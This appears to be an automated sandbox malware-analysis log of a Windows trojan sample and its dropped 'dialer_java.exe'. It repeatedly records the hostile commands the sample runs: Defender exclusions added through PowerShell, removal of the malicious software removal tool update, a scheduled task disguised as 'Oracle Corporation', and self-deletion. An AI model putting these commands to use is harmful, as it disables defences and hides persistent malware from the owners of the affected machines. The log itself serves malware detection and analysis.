Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 83_2_00007FF7C0F0D0F083_2_00007FF7C0F0D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF642743B8097_2_00007FF642743B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF642721B4097_2_00007FF642721B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF64272AD1097_2_00007FF64272AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF64273652097_2_00007FF642736520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF64273444097_2_00007FF642734440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF64272A48097_2_00007FF64272A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF64273016097_2_00007FF642730160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF6427292BB97_2_00007FF6427292BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF642730A7097_2_00007FF642730A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF64273D0F097_2_00007FF64273D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF6427376E097_2_00007FF6427376E0
Source: C:\Windows\System32\conhost.exeCode function: String function: 000000014000E9F0 appears 42 times
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeCode function: String function: 00007FF6099B1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF6ECFF1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF71BD51394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF7C0EF1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF642721394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF6E3A63D60 appears 48 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF75B4A1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: String function: 00007FF6E3A61394 appears 62 times
Source: sE5IdDeTp2.exeStatic PE information: invalid certificate
Source: classification engineClassification label: mal96.troj.expl.evad.winEXE@250/60@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_03
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeFile created: C:\Users\user\AppData\Local\Temp\mlothfmoemid.xmlJump to behavior
Source: sE5IdDeTp2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: sE5IdDeTp2.exeReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeFile read: C:\Users\user\Desktop\sE5IdDeTp2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\sE5IdDeTp2.exe "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wusa.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wusa.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"Jump to behavior
